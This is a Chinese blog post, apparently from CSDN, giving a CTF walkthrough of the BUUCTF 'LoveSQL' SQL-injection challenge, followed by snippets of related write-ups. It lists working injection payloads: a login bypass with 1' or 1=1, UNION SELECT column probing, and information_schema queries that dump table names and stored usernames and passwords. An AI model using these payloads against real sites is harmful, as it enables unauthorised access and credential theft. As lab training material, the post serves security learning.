CTF练习——[极客大挑战 2019]LoveSQL1

最新推荐文章于 2022-01-15 20:31:25 发布
最新推荐文章于 2022-01-15 20:31:25 发布
阅读量3.2k 收藏 1
点赞数
文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35987366/article/details/120828405
版权

一道基础的sql注入练习题,写一下做题思路。

 看到一个登录框,随便输入发现是get传参,尝试是否存在sql注入,username=admin'  password=123456。

页面报错,存在sql注入,尝试使用万能密码。username=admin password=1' or 1=1 -- qwe。成功登录。

 参数username出存在注入点,构造sql语句寻找回显点。步骤如下:

(1)猜解字段数

当username=1' order by 4 -- qwe  password=123456时,页面报错。

 

当username=1' order by 3 -- qwe  password=123456时,页面正常。

判断有三个字段。

(2)寻找回显点

构造sql语句:username=1' union select 1,2,3 -- qew password=123456 ;发现存在两个回显点。

最后,通过构造sql语句,查库名,查表名,查数据,得出flag。

查表名:1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 -- QWE

 

查列名:1' union select 1,2,column_name from information_schema.columns where table_name=表名 and table_schema=database() limit 0,1 -- QWE

 

查字段内容:1' union select 1,字段名,字段名 from 表名 limit 0,1 -- QWE

这里可以用GROUP_CONCAT 函数将多行数据进行整合在一行输出。

查表名:1' union select 1,2,GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database() -- qwe

 

查列名:1' union select 1,2,GROUP_CONCAT(column_name) from information_schema.columns where table_name='geekuser' and table_schema=database() -- qwe

 

查字段内容:1' union select 1,2,group_concat(id,username,password) from geekuser -- qwe 

得出flag。 

hgdehsns
关注
网络安全 | CTFCTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5153
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
CTF学习笔记——[极客挑战 2019]BuyFlag
Obs_cure的博客
02-16 3557
一、[极客挑战 2019]BuyFlag 1.题目 2.解题步骤 MENU界面下有buyflag的界面,按F12看看 查了一下is_numeric()这个函数,他的作用是判断输入是否是数字的。如果是纯数字返回true,如果不是返回false。这道题注释的代码逻辑是要输入一个非纯数字的字符串且等于404,密码才能正确。 然后顺手百度了一下这个函数的漏洞,在这里贴出来: 这个函数和mysql结合起来就容易出问题,那是因为is_numeric判断的时候,当碰到16进制数的时候,也会判断成数字 is_num
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1198
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
[极客挑战 2019]LoveSQL 1
热门推荐
satasun的博客
05-20 1万+
一个比较简单的SQL注入题目,写一下做个笔记。 看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下: 万能密码如下: 这里账号填1' or 1=1#,密码随便写。 登陆成功,看了一下url,是以get方式进行传参。先在username处测试一下有没有注入点: ?username=1' order by 1%23&password=ads
buuctf-[极客挑战 2019]LoveSQL1(小宇特详解)
小宇的web博客
01-15 1389
buuctf-[极客挑战 2019]LoveSQL1(小宇特详解) 1.这里有账号和密码,这里先尝试一下万能密码(在账号那里注入) 1' or 1=1# 密码随便 这里继续进行注入,判断有几列 1' order by 3;# 这里试一试4 1' order by 4;# 这里通过union联合查询 1' union select 1,2,3;# 这里的2,3都是注入点 这里开始按部就班的注入吧 1' union select 1,2,database();# 1' union se
CTF-Web-[极客挑战 2019]LoveSQL
归子莫的博客
05-03 1850
CTF-Web-[极客挑战 2019]LoveSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]LoveSQL 打开题目的实例 思路 看到这个熟悉的界面,看到...
CTF学习笔记——LoveSQL
Obs_cure的博客
09-14 978
一、[极客挑战 2019]LoveSQL 1.题目 2.解题步骤 题目提示了sqlmap,还是老规矩试一下 继续使用其他sql语句尝试一下,先试试万能的1' or 1=1 #,结果成功了…爆出一段奇妙的码,试了一下不是flag。接下来尝试一下查询呢 3.总结 4.参考资料 buuctf 极客挑战 lovesql_SopRomeo的博客-CSDN博客 ...
CTF学习笔记——[极客挑战 2019]PHP
Obs_cure的博客
12-10 511
一、[极客挑战 2019]PHP 1.题目 题目是一只可爱的猫猫 2.解题步骤 提示备份,因此访问一下index.php~ 失败力,访问一下bak呢 换个思路 访问一下flag.php 竟然没有拒绝访问,看来是有这个文件,继续访问flag的备份试试 3.总结 4.参考资料 ...
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1455
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
Buuctf极客挑战练习
qq_45927819的博客
08-03 471
文章目录[极客挑战 2019]Knife 1[极客挑战 2019]Http 1[极客挑战 2019]Upload 1[极客挑战 2019]PHP 1 [极客挑战 2019]Knife 1 白给的shell 一句话木马 直接蚁剑或者菜刀连接 在根目录下得到flag [极客挑战 2019]Http 1 打开环境查看源码发现Secret.php: 访问一下: 也就是这个网页不是来自https://www.Sycsecret.com的 抓包,添加referer头,referer头就是证明你从哪
buuctf 极客挑战 lovesql
SopRomeo的博客
01-17 3544
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
Ctfshow——web2简单的SQL注入
yu_19980401的博客
09-27 515
Ctfshow——web2 简单的SQL注入 万能密码登录 username=admin'+or+1=1#&password=123 出现登录成功的提示 查询列数 username=admin'+or+1=1+order+by+1,2,3#&password=123 3回显正常,4无回显,判断有3列 查询数据库名 username=admin'+or+1=1+union+select+1,database(),3#&password=123 查询数据库内数据表 u
CTF---BUUCTF之[极客挑战 2019]LoveSQL 1
weixin_44632787的博客
06-17 1534
CTF练习题里的BUUCTF之[极客挑战 2019]LoveSQL 1 启动我们的挑战项目,这题一看就知道是SQL注入了。。。而且跟上一次做的好像,不知道这一次的难不难。 先来随便输入个“万能钥匙”吧!1’ or 1=1 # 嗯哼?这个是MD5加密吗? 上网找一下MD5在线加解密的网站:https://www.cmd5.com/。 看看能不能得到我们想要的答案 果然没解出来,照理说CTF的题不会这么简单。这个可能是一个陷阱,或者是另外一种解法(反正我不会…)。所以,我们试试正常的解题思路吧!先用
【BUUCTF】[极客挑战 2019]LoveSQL 详细题解总结笔记 Writeup
algae
08-13 3465
【BUUCTF】[极客挑战 2019]LoveSQL一.题目内容1.考点二. 解题过程1.万能密码2.爆字段3. 一.题目内容 1.考点 二. 解题过程 1.万能密码 账号 admin' or 1=1 # 密码 1 admin 47cb230740bc6725fd194aec8e479fc4 Tips:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 2.爆字段 check.php?username=admin ' order by 1 %23&passwo
ctf 选择题 题库_实验吧CTF题库-WEB题(部分)
weixin_39613548的博客
12-19 1237
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
BUUCTF web部分题(二)
yqdid的博客
04-01 1781
[极客挑战 2019]EasySQL 这是一道sq 注入题 ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq注入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句中有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行注入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
CTF-曲折的人生(历时9小时)
cc菜的一批
12-05 444
题目地址:地址 输入123’ 回显了sql 的查询语句: select id,username,password from `admin` where username=‘123’' 从语句中,直观的看出 1、字段为:id、username、password 2、表为:admin 3、字符型注入,单引号闭合 输入:1’or 1=1# 得知以下信息: 1、过滤了空格 2、过滤了or 过滤空格,尝...
ctf练习
moon__________的博客
10-09 3763
攻防世界WEB-Challenge area -Web php include WEB-Challenge area -Web php include 代码审计可以轻松知道本题考查文件包含并且过滤的php:// 所以我们用data://伪协议来传输数据,成功执行phpinfo() http://111.200.241.244:59922/index.php?page=data://text/plain,<?php phpinfo();?> 接下来我们利用大小写测试服务器操作系统(其实上图已
CTF web题目中怎么用写脚本的方法POST传参?——-利用python脚本
日熙的博客
07-14 4136
Python 提供了简单易用、功能强大的 HTTP 第三方开源库 Requests,帮助我们轻松解决关于 HTTP 的大部分问题。 在写python脚本之前必须得先导入requests模块哦,详细教程见:win10 python如何安装requests———超详细教程 下面就用题目Bugku web基础$_POST来做示范: 运行python程序,输入如下命令: import requests r = requests.post(‘http://123.206.87.240:8002/post/’, dat
[极客挑战 2019]BuyFlag
最新发布
07-29
- *2* *3* [CTF学习笔记——[极客挑战 2019]BuyFlag](https://blog.csdn.net/Obs_cure/article/details/113820888)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值